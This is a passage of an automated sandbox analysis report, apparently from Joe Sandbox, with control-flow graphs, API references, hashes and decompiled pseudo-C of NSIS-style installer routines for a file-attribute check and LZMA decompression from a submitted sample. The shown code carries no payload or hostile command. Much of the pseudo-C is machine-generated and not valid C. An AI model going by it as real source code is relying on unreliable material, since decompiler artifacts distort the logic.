                      control_flow_graph 673 40603f-40605a call 406668 call 405fe2 678 406060-40606d call 4068ef 673->678 679 40605c-40605e 673->679 683 40607d-406081 678->683 684 40606f-406075 678->684 680 4060b8-4060ba 679->680 686 406097-4060a0 lstrlenW 683->686 684->679 685 406077-40607b 684->685 685->679 685->683 687 4060a2-4060b6 call 405f37 GetFileAttributesW 686->687 688 406083-40608a call 40699e 686->688 687->680 693 406091-406092 call 405f83 688->693 694 40608c-40608f 688->694 693->686 694->679 694->693
                      C-Code - Quality: 53%
                      			E0040603F(void* __eflags, intOrPtr _a4) {
                      				int _t11;
                      				signed char* _t12;
                      				long _t16;
                      				intOrPtr _t18;
                      				intOrPtr* _t21;
                      				signed int _t23;
                      
                      				E00406668(0x425f50, _a4);
                      				_t21 = E00405FE2(0x425f50);
                      				if(_t21 != 0) {
                      					E004068EF(_t21);
                      					if(( *0x42a278 & 0x00000080) == 0) {
                      						L5:
                      						_t23 = _t21 - 0x425f50 >> 1;
                      						while(1) {
                      							_t11 = lstrlenW(0x425f50);
                      							_push(0x425f50);
                      							if(_t11 <= _t23) {
                      								break;
                      							}
                      							_t12 = E0040699E();
                      							if(_t12 == 0 || ( *_t12 & 0x00000010) != 0) {
                      								E00405F83(0x425f50);
                      								continue;
                      							} else {
                      								goto L1;
                      							}
                      						}
                      						E00405F37();
                      						_t16 = GetFileAttributesW(??); // executed
                      						return 0 | _t16 != 0xffffffff;
                      					}
                      					_t18 =  *_t21;
                      					if(_t18 == 0 || _t18 == 0x5c) {
                      						goto L1;
                      					} else {
                      						goto L5;
                      					}
                      				}
                      				L1:
                      				return 0;
                      			}









                      0x0040604b
                      0x00406056
                      0x0040605a
                      0x00406061
                      0x0040606d
                      0x0040607d
                      0x0040607f
                      0x00406097
                      0x00406098
                      0x0040609f
                      0x004060a0
                      0x00000000
                      0x00000000
                      0x00406083
                      0x0040608a
                      0x00406092
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00000000
                      0x0040608a
                      0x004060a2
                      0x004060a8
                      0x00000000
                      0x004060b6
                      0x0040606f
                      0x00406075
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00406075
                      0x0040605c
                      0x00000000

                      APIs
                        • Part of subcall function 00406668: lstrcpynW.KERNEL32(?,?,00000400,004037B0,00429260,NSIS Error), ref: 00406675
                        • Part of subcall function 00405FE2: CharNextW.USER32(?,?,00425F50,?,00406056,00425F50,00425F50,772EFAA0,?,772EF560,00405D94,?,772EFAA0,772EF560,00000000), ref: 00405FF0
                        • Part of subcall function 00405FE2: CharNextW.USER32(00000000), ref: 00405FF5
                        • Part of subcall function 00405FE2: CharNextW.USER32(00000000), ref: 0040600D
                      • lstrlenW.KERNEL32(00425F50,00000000,00425F50,00425F50,772EFAA0,?,772EF560,00405D94,?,772EFAA0,772EF560,00000000), ref: 00406098
                      • GetFileAttributesW.KERNELBASE(00425F50,00425F50,00425F50,00425F50,00425F50,00425F50,00000000,00425F50,00425F50,772EFAA0,?,772EF560,00405D94,?,772EFAA0,772EF560), ref: 004060A8
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.253377158.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.253370521.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.253387347.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.253394584.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.253394584.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.253394584.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.253394584.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.253394584.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.253445143.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_fyTwP4SHWF.jbxd
                      Similarity
                      • API ID: CharNext$AttributesFilelstrcpynlstrlen
                      • String ID: P_B
                      • API String ID: 3248276644-906794629
                      • Opcode ID: 900e3a3aedd828ccf636743a116f58552bc6887dcb5d3e9637a901da882d1290
                      • Instruction ID: df110f430b83b9381375b5fd3fa67f6c4419d4890c6468873e0fced3c2676832
                      • Opcode Fuzzy Hash: 900e3a3aedd828ccf636743a116f58552bc6887dcb5d3e9637a901da882d1290
                      • Instruction Fuzzy Hash: 0DF07826144A1216E622B23A0C05BAF05098F82354B07063FFC93B22E1DF3C8973C43E
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 696 407194-40719a 697 40719c-40719e 696->697 698 40719f-4071bd 696->698 697->698 699 407490-40749d 698->699 700 4073cb-4073e0 698->700 703 4074c7-4074cb 699->703 701 4073e2-4073f8 700->701 702 4073fa-407410 700->702 704 407413-40741a 701->704 702->704 705 40752b-40753e 703->705 706 4074cd-4074ee 703->706 707 407441 704->707 708 40741c-407420 704->708 709 407447-40744d 705->709 710 4074f0-407505 706->710 711 407507-40751a 706->711 707->709 713 407426-40743e 708->713 714 4075cf-4075d9 708->714 717 406bf2 709->717 718 4075fa 709->718 712 40751d-407524 710->712 711->712 719 4074c4 712->719 720 407526 712->720 713->707 716 4075e5-4075f8 714->716 726 4075fd-407601 716->726 721 406bf9-406bfd 717->721 722 406d39-406d5a 717->722 723 406c9e-406ca2 717->723 724 406d0e-406d12 717->724 718->726 719->703 727 4074a9-4074c1 720->727 728 4075db 720->728 721->716 729 406c03-406c10 721->729 722->700 732 406ca8-406cc1 723->732 733 40754e-407558 723->733 730 406d18-406d2c 724->730 731 40755d-407567 724->731 727->719 728->716 729->718 734 406c16-406c5c 729->734 735 406d2f-406d37 730->735 731->716 736 406cc4-406cc8 732->736 733->716 737 406c84-406c86 734->737 738 406c5e-406c62 734->738 735->722 735->724 736->723 739 406cca-406cd0 736->739 744 406c94-406c9c 737->744 745 406c88-406c92 737->745 742 406c64-406c67 GlobalFree 738->742 743 406c6d-406c7b GlobalAlloc 738->743 740 406cd2-406cd9 739->740 741 406cfa-406d0c 739->741 746 406ce4-406cf4 GlobalAlloc 740->746 747 406cdb-406cde GlobalFree 740->747 741->735 742->743 743->718 748 406c81 743->748 744->736 745->744 745->745 746->718 746->741 747->746 748->737
                      C-Code - Quality: 99%
                      			E00407194() {
                      				signed int _t530;
                      				void _t537;
                      				signed int _t538;
                      				signed int _t539;
                      				unsigned short _t569;
                      				signed int _t579;
                      				signed int _t607;
                      				void* _t627;
                      				signed int _t628;
                      				signed int _t635;
                      				signed int* _t643;
                      				void* _t644;
                      
                      				L0:
                      				while(1) {
                      					L0:
                      					_t530 =  *(_t644 - 0x30);
                      					if(_t530 >= 4) {
                      					}
                      					 *(_t644 - 0x40) = 6;
                      					 *(_t644 - 0x7c) = 0x19;
                      					 *((intOrPtr*)(_t644 - 0x58)) = (_t530 << 7) +  *(_t644 - 4) + 0x360;
                      					while(1) {
                      						L145:
                      						 *(_t644 - 0x50) = 1;
                      						 *(_t644 - 0x48) =  *(_t644 - 0x40);
                      						while(1) {
                      							L149:
                      							if( *(_t644 - 0x48) <= 0) {
                      								goto L155;
                      							}
                      							L150:
                      							_t627 =  *(_t644 - 0x50) +  *(_t644 - 0x50);
                      							_t643 = _t627 +  *((intOrPtr*)(_t644 - 0x58));
                      							 *(_t644 - 0x54) = _t643;
                      							_t569 =  *_t643;
                      							_t635 = _t569 & 0x0000ffff;
                      							_t607 = ( *(_t644 - 0x10) >> 0xb) * _t635;
                      							if( *(_t644 - 0xc) >= _t607) {
                      								 *(_t644 - 0x10) =  *(_t644 - 0x10) - _t607;
                      								 *(_t644 - 0xc) =  *(_t644 - 0xc) - _t607;
                      								_t628 = _t627 + 1;
                      								 *_t643 = _t569 - (_t569 >> 5);
                      								 *(_t644 - 0x50) = _t628;
                      							} else {
                      								 *(_t644 - 0x10) = _t607;
                      								 *(_t644 - 0x50) =  *(_t644 - 0x50) << 1;
                      								 *_t643 = (0x800 - _t635 >> 5) + _t569;
                      							}
                      							if( *(_t644 - 0x10) >= 0x1000000) {
                      								L148:
                      								_t487 = _t644 - 0x48;
                      								 *_t487 =  *(_t644 - 0x48) - 1;
                      								L149:
                      								if( *(_t644 - 0x48) <= 0) {
                      									goto L155;
                      								}
                      								goto L150;
                      							} else {
                      								L154:
                      								L146:
                      								if( *(_t644 - 0x6c) == 0) {
                      									L169:
                      									 *(_t644 - 0x88) = 0x18;
                      									L170:
                      									_t579 = 0x22;
                      									memcpy( *(_t644 - 0x90), _t644 - 0x88, _t579 << 2);
                      									_t539 = 0;
                      									L172:
                      									return _t539;
                      								}
                      								L147:
                      								 *(_t644 - 0x10) =  *(_t644 - 0x10) << 8;
                      								 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
                      								_t484 = _t644 - 0x70;
                      								 *_t484 =  &(( *(_t644 - 0x70))[1]);
                      								 *(_t644 - 0xc) =  *(_t644 - 0xc) << 0x00000008 |  *( *(_t644 - 0x70)) & 0x000000ff;
                      								goto L148;
                      							}
                      							L155:
                      							_t537 =  *(_t644 - 0x7c);
                      							 *((intOrPtr*)(_t644 - 0x44)) =  *(_t644 - 0x50) - (1 <<  *(_t644 - 0x40));
                      							while(1) {
                      								L140:
                      								 *(_t644 - 0x88) = _t537;
                      								while(1) {
                      									L1:
                      									_t538 =  *(_t644 - 0x88);
                      									if(_t538 > 0x1c) {
                      										break;
                      									}
                      									L2:
                      									switch( *((intOrPtr*)(_t538 * 4 +  &M00407602))) {
                      										case 0:
                      											L3:
                      											if( *(_t644 - 0x6c) == 0) {
                      												goto L170;
                      											}
                      											L4:
                      											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
                      											 *(_t644 - 0x70) =  &(( *(_t644 - 0x70))[1]);
                      											_t538 =  *( *(_t644 - 0x70));
                      											if(_t538 > 0xe1) {
                      												goto L171;
                      											}
                      											L5:
                      											_t542 = _t538 & 0x000000ff;
                      											_push(0x2d);
                      											asm("cdq");
                      											_pop(_t581);
                      											_push(9);
                      											_pop(_t582);
                      											_t638 = _t542 / _t581;
                      											_t544 = _t542 % _t581 & 0x000000ff;
                      											asm("cdq");
                      											_t633 = _t544 % _t582 & 0x000000ff;
                      											 *(_t644 - 0x3c) = _t633;
                      											 *(_t644 - 0x1c) = (1 << _t638) - 1;
                      											 *((intOrPtr*)(_t644 - 0x18)) = (1 << _t544 / _t582) - 1;
                      											_t641 = (0x300 << _t633 + _t638) + 0x736;
                      											if(0x600 ==  *((intOrPtr*)(_t644 - 0x78))) {
                      												L10:
                      												if(_t641 == 0) {
                      													L12:
                      													 *(_t644 - 0x48) =  *(_t644 - 0x48) & 0x00000000;
                      													 *(_t644 - 0x40) =  *(_t644 - 0x40) & 0x00000000;
                      													goto L15;
                      												} else {
                      													goto L11;
                      												}
                      												do {
                      													L11:
                      													_t641 = _t641 - 1;
                      													 *((short*)( *(_t644 - 4) + _t641 * 2)) = 0x400;
                      												} while (_t641 != 0);
                      												goto L12;
                      											}
                      											L6:
                      											if( *(_t644 - 4) != 0) {
                      												GlobalFree( *(_t644 - 4));
                      											}
                      											_t538 = GlobalAlloc(0x40, 0x600); // executed
                      											 *(_t644 - 4) = _t538;
                      											if(_t538 == 0) {
                      												goto L171;
                      											} else {
                      												 *((intOrPtr*)(_t644 - 0x78)) = 0x600;
                      												goto L10;
                      											}
                      										case 1:
                      											L13:
                      											__eflags =  *(_t644 - 0x6c);
                      											if( *(_t644 - 0x6c) == 0) {
                      												L157:
                      												 *(_t644 - 0x88) = 1;
                      												goto L170;
                      											}
                      											L14:
                      											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
                      											 *(_t644 - 0x40) =  *(_t644 - 0x40) | ( *( *(_t644 - 0x70)) & 0x000000ff) <<  *(_t644 - 0x48) << 0x00000003;
                      											 *(_t644 - 0x70) =  &(( *(_t644 - 0x70))[1]);
                      											_t45 = _t644 - 0x48;
                      											 *_t45 =  *(_t644 - 0x48) + 1;
                      											__eflags =  *_t45;
                      											L15:
                      											if( *(_t644 - 0x48) < 4) {
                      												goto L13;
                      											}
                      											L16:
                      											_t550 =  *(_t644 - 0x40);
                      											if(_t550 ==  *(_t644 - 0x74)) {
                      												L20:
                      												 *(_t644 - 0x48) = 5;
                      												 *( *(_t644 - 8) +  *(_t644 - 0x74) - 1) =  *( *(_t644 - 8) +  *(_t644 - 0x74) - 1) & 0x00000000;
                      												goto L23;
                      											}
                      											L17:
                      											 *(_t644 - 0x74) = _t550;
                      											if( *(_t644 - 8) != 0) {
                      												GlobalFree( *(_t644 - 8));
                      											}
                      											_t538 = GlobalAlloc(0x40,  *(_t644 - 0x40)); // executed
                      											 *(_t644 - 8) = _t538;
                      											if(_t538 == 0) {
                      												goto L171;
                      											} else {
                      												goto L20;
                      											}
                      										case 2:
                      											L24:
                      											_t557 =  *(_t644 - 0x60) &  *(_t644 - 0x1c);
                      											 *(_t644 - 0x84) = 6;
                      											 *(_t644 - 0x4c) = _t557;
                      											_t642 =  *(_t644 - 4) + (( *(_t644 - 0x38) << 4) + _t557) * 2;
                      											goto L132;
                      										case 3:
                      											L21:
                      											__eflags =  *(_t644 - 0x6c);
                      											if( *(_t644 - 0x6c) == 0) {
                      												L158:
                      												 *(_t644 - 0x88) = 3;
                      												goto L170;
                      											}
                      											L22:
                      											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
                      											_t67 = _t644 - 0x70;
                      											 *_t67 =  &(( *(_t644 - 0x70))[1]);
                      											__eflags =  *_t67;
                      											 *(_t644 - 0xc) =  *(_t644 - 0xc) << 0x00000008 |  *( *(_t644 - 0x70)) & 0x000000ff;
                      											L23:
                      											 *(_t644 - 0x48) =  *(_t644 - 0x48) - 1;
                      											if( *(_t644 - 0x48) != 0) {
                      												goto L21;
                      											}
                      											goto L24;
                      										case 4:
                      											L133:
                      											_t559 =  *_t642;
                      											_t626 = _t559 & 0x0000ffff;
                      											_t596 = ( *(_t644 - 0x10) >> 0xb) * _t626;
                      											if( *(_t644 - 0xc) >= _t596) {
                      												 *(_t644 - 0x10) =  *(_t644 - 0x10) - _t596;
                      												 *(_t644 - 0xc) =  *(_t644 - 0xc) - _t596;
                      												 *(_t644 - 0x40) = 1;
                      												_t560 = _t559 - (_t559 >> 5);
                      												__eflags = _t560;
                      												 *_t642 = _t560;
                      											} else {
                      												 *(_t644 - 0x10) = _t596;
                      												 *(_t644 - 0x40) =  *(_t644 - 0x40) & 0x00000000;
                      												 *_t642 = (0x800 - _t626 >> 5) + _t559;
                      											}
                      											if( *(_t644 - 0x10) >= 0x1000000) {
                      												goto L139;
                      											} else {
                      												goto L137;
                      											}
                      										case 5:
                      											L137:
                      											if( *(_t644 - 0x6c) == 0) {
                      												L168:
                      												 *(_t644 - 0x88) = 5;
                      												goto L170;
                      											}
                      											L138:
                      											 *(_t644 - 0x10) =  *(_t644 - 0x10) << 8;
                      											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
                      											 *(_t644 - 0x70) =  &(( *(_t644 - 0x70))[1]);
                      											 *(_t644 - 0xc) =  *(_t644 - 0xc) << 0x00000008 |  *( *(_t644 - 0x70)) & 0x000000ff;
                      											L139:
                      											_t537 =  *(_t644 - 0x84);
                      											L140:
                      											 *(_t644 - 0x88) = _t537;
                      											goto L1;
                      										case 6:
                      											L25:
                      											__edx = 0;
                      											__eflags =  *(__ebp - 0x40);
                      											if( *(__ebp - 0x40) != 0) {
                      												L36:
                      												__eax =  *(__ebp - 4);
                      												__ecx =  *(__ebp - 0x38);
                      												 *(__ebp - 0x34) = 1;
                      												 *(__ebp - 0x84) = 7;
                      												__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
                      												goto L132;
                      											}
                      											L26:
                      											__eax =  *(__ebp - 0x5c) & 0x000000ff;
                      											__esi =  *(__ebp - 0x60);
                      											__cl = 8;
                      											__cl = 8 -  *(__ebp - 0x3c);
                      											__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
                      											__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
                      											__ecx =  *(__ebp - 0x3c);
                      											__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
                      											__ecx =  *(__ebp - 4);
                      											(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
                      											__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
                      											__eflags =  *(__ebp - 0x38) - 4;
                      											__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                      											 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                      											if( *(__ebp - 0x38) >= 4) {
                      												__eflags =  *(__ebp - 0x38) - 0xa;
                      												if( *(__ebp - 0x38) >= 0xa) {
                      													_t98 = __ebp - 0x38;
                      													 *_t98 =  *(__ebp - 0x38) - 6;
                      													__eflags =  *_t98;
                      												} else {
                      													 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
                      												}
                      											} else {
                      												 *(__ebp - 0x38) = 0;
                      											}
                      											__eflags =  *(__ebp - 0x34) - __edx;
                      											if( *(__ebp - 0x34) == __edx) {
                      												L35:
                      												__ebx = 0;
                      												__ebx = 1;
                      												goto L61;
                      											} else {
                      												L32:
                      												__eax =  *(__ebp - 0x14);
                      												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                      												__eflags = __eax -  *(__ebp - 0x74);
                      												if(__eax >=  *(__ebp - 0x74)) {
                      													__eax = __eax +  *(__ebp - 0x74);
                      													__eflags = __eax;
                      												}
                      												__ecx =  *(__ebp - 8);
                      												__ebx = 0;
                      												__ebx = 1;
                      												__al =  *((intOrPtr*)(__eax + __ecx));
                      												 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
                      												goto L41;
                      											}
                      										case 7:
                      											L66:
                      											__eflags =  *(__ebp - 0x40) - 1;
                      											if( *(__ebp - 0x40) != 1) {
                      												L68:
                      												__eax =  *(__ebp - 0x24);
                      												 *(__ebp - 0x80) = 0x16;
                      												 *(__ebp - 0x20) =  *(__ebp - 0x24);
                      												__eax =  *(__ebp - 0x28);
                      												 *(__ebp - 0x24) =  *(__ebp - 0x28);
                      												__eax =  *(__ebp - 0x2c);
                      												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                      												__eax = 0;
                      												__eflags =  *(__ebp - 0x38) - 7;
                      												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                      												__al = __al & 0x000000fd;
                      												__eax = (__eflags >= 0) - 1 + 0xa;
                      												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
                      												__eax =  *(__ebp - 4);
                      												__eax =  *(__ebp - 4) + 0x664;
                      												__eflags = __eax;
                      												 *(__ebp - 0x58) = __eax;
                      												goto L69;
                      											}
                      											L67:
                      											__eax =  *(__ebp - 4);
                      											__ecx =  *(__ebp - 0x38);
                      											 *(__ebp - 0x84) = 8;
                      											__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
                      											goto L132;
                      										case 8:
                      											L70:
                      											__eflags =  *(__ebp - 0x40);
                      											if( *(__ebp - 0x40) != 0) {
                      												__eax =  *(__ebp - 4);
                      												__ecx =  *(__ebp - 0x38);
                      												 *(__ebp - 0x84) = 0xa;
                      												__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
                      											} else {
                      												__eax =  *(__ebp - 0x38);
                      												__ecx =  *(__ebp - 4);
                      												__eax =  *(__ebp - 0x38) + 0xf;
                      												 *(__ebp - 0x84) = 9;
                      												 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
                      												__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
                      											}
                      											goto L132;
                      										case 9:
                      											L73:
                      											__eflags =  *(__ebp - 0x40);
                      											if( *(__ebp - 0x40) != 0) {
                      												goto L90;
                      											}
                      											L74:
                      											__eflags =  *(__ebp - 0x60);
                      											if( *(__ebp - 0x60) == 0) {
                      												goto L171;
                      											}
                      											L75:
                      											__eax = 0;
                      											__eflags =  *(__ebp - 0x38) - 7;
                      											_t259 =  *(__ebp - 0x38) - 7 >= 0;
                      											__eflags = _t259;
                      											0 | _t259 = _t259 + _t259 + 9;
                      											 *(__ebp - 0x38) = _t259 + _t259 + 9;
                      											goto L76;
                      										case 0xa:
                      											L82:
                      											__eflags =  *(__ebp - 0x40);
                      											if( *(__ebp - 0x40) != 0) {
                      												L84:
                      												__eax =  *(__ebp - 4);
                      												__ecx =  *(__ebp - 0x38);
                      												 *(__ebp - 0x84) = 0xb;
                      												__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
                      												goto L132;
                      											}
                      											L83:
                      											__eax =  *(__ebp - 0x28);
                      											goto L89;
                      										case 0xb:
                      											L85:
                      											__eflags =  *(__ebp - 0x40);
                      											if( *(__ebp - 0x40) != 0) {
                      												__ecx =  *(__ebp - 0x24);
                      												__eax =  *(__ebp - 0x20);
                      												 *(__ebp - 0x20) =  *(__ebp - 0x24);
                      											} else {
                      												__eax =  *(__ebp - 0x24);
                      											}
                      											__ecx =  *(__ebp - 0x28);
                      											 *(__ebp - 0x24) =  *(__ebp - 0x28);
                      											L89:
                      											__ecx =  *(__ebp - 0x2c);
                      											 *(__ebp - 0x2c) = __eax;
                      											 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                      											L90:
                      											__eax =  *(__ebp - 4);
                      											 *(__ebp - 0x80) = 0x15;
                      											__eax =  *(__ebp - 4) + 0xa68;
                      											 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
                      											goto L69;
                      										case 0xc:
                      											L99:
                      											__eflags =  *(__ebp - 0x6c);
                      											if( *(__ebp - 0x6c) == 0) {
                      												L164:
                      												 *(__ebp - 0x88) = 0xc;
                      												goto L170;
                      											}
                      											L100:
                      											__ecx =  *(__ebp - 0x70);
                      											__eax =  *(__ebp - 0xc);
                      											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                      											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                      											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                      											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                      											_t334 = __ebp - 0x70;
                      											 *_t334 =  *(__ebp - 0x70) + 1;
                      											__eflags =  *_t334;
                      											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                      											__eax =  *(__ebp - 0x2c);
                      											goto L101;
                      										case 0xd:
                      											L37:
                      											__eflags =  *(__ebp - 0x6c);
                      											if( *(__ebp - 0x6c) == 0) {
                      												L159:
                      												 *(__ebp - 0x88) = 0xd;
                      												goto L170;
                      											}
                      											L38:
                      											__ecx =  *(__ebp - 0x70);
                      											__eax =  *(__ebp - 0xc);
                      											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                      											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                      											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                      											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                      											_t122 = __ebp - 0x70;
                      											 *_t122 =  *(__ebp - 0x70) + 1;
                      											__eflags =  *_t122;
                      											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                      											L39:
                      											__eax =  *(__ebp - 0x40);
                      											__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                      											if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
                      												goto L48;
                      											}
                      											L40:
                      											__eflags = __ebx - 0x100;
                      											if(__ebx >= 0x100) {
                      												goto L54;
                      											}
                      											L41:
                      											__eax =  *(__ebp - 0x5b) & 0x000000ff;
                      											 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
                      											__ecx =  *(__ebp - 0x58);
                      											__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
                      											 *(__ebp - 0x48) = __eax;
                      											__eax = __eax + 1;
                      											__eax = __eax << 8;
                      											__eax = __eax + __ebx;
                      											__esi =  *(__ebp - 0x58) + __eax * 2;
                      											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                      											__ax =  *__esi;
                      											 *(__ebp - 0x54) = __esi;
                      											__edx = __ax & 0x0000ffff;
                      											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
                      											__eflags =  *(__ebp - 0xc) - __ecx;
                      											if( *(__ebp - 0xc) >= __ecx) {
                      												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                      												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                      												__cx = __ax;
                      												 *(__ebp - 0x40) = 1;
                      												__cx = __ax >> 5;
                      												__eflags = __eax;
                      												__ebx = __ebx + __ebx + 1;
                      												 *__esi = __ax;
                      											} else {
                      												 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
                      												 *(__ebp - 0x10) = __ecx;
                      												0x800 = 0x800 - __edx;
                      												0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
                      												__ebx = __ebx + __ebx;
                      												 *__esi = __cx;
                      											}
                      											__eflags =  *(__ebp - 0x10) - 0x1000000;
                      											 *(__ebp - 0x44) = __ebx;
                      											if( *(__ebp - 0x10) >= 0x1000000) {
                      												goto L39;
                      											} else {
                      												L45:
                      												goto L37;
                      											}
                      										case 0xe:
                      											L46:
                      											__eflags =  *(__ebp - 0x6c);
                      											if( *(__ebp - 0x6c) == 0) {
                      												L160:
                      												 *(__ebp - 0x88) = 0xe;
                      												goto L170;
                      											}
                      											L47:
                      											__ecx =  *(__ebp - 0x70);
                      											__eax =  *(__ebp - 0xc);
                      											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                      											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                      											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                      											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                      											_t156 = __ebp - 0x70;
                      											 *_t156 =  *(__ebp - 0x70) + 1;
                      											__eflags =  *_t156;
                      											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                      											while(1) {
                      												L48:
                      												__eflags = __ebx - 0x100;
                      												if(__ebx >= 0x100) {
                      													break;
                      												}
                      												L49:
                      												__eax =  *(__ebp - 0x58);
                      												__edx = __ebx + __ebx;
                      												__ecx =  *(__ebp - 0x10);
                      												__esi = __edx + __eax;
                      												__ecx =  *(__ebp - 0x10) >> 0xb;
                      												__ax =  *__esi;
                      												 *(__ebp - 0x54) = __esi;
                      												__edi = __ax & 0x0000ffff;
                      												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                      												__eflags =  *(__ebp - 0xc) - __ecx;
                      												if( *(__ebp - 0xc) >= __ecx) {
                      													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                      													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                      													__cx = __ax;
                      													_t170 = __edx + 1; // 0x1
                      													__ebx = _t170;
                      													__cx = __ax >> 5;
                      													__eflags = __eax;
                      													 *__esi = __ax;
                      												} else {
                      													 *(__ebp - 0x10) = __ecx;
                      													0x800 = 0x800 - __edi;
                      													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                      													__ebx = __ebx + __ebx;
                      													 *__esi = __cx;
                      												}
                      												__eflags =  *(__ebp - 0x10) - 0x1000000;
                      												 *(__ebp - 0x44) = __ebx;
                      												if( *(__ebp - 0x10) >= 0x1000000) {
                      													continue;
                      												} else {
                      													L53:
                      													goto L46;
                      												}
                      											}
                      											L54:
                      											_t173 = __ebp - 0x34;
                      											 *_t173 =  *(__ebp - 0x34) & 0x00000000;
                      											__eflags =  *_t173;
                      											goto L55;
                      										case 0xf:
                      											L58:
                      											__eflags =  *(__ebp - 0x6c);
                      											if( *(__ebp - 0x6c) == 0) {
                      												L161:
                      												 *(__ebp - 0x88) = 0xf;
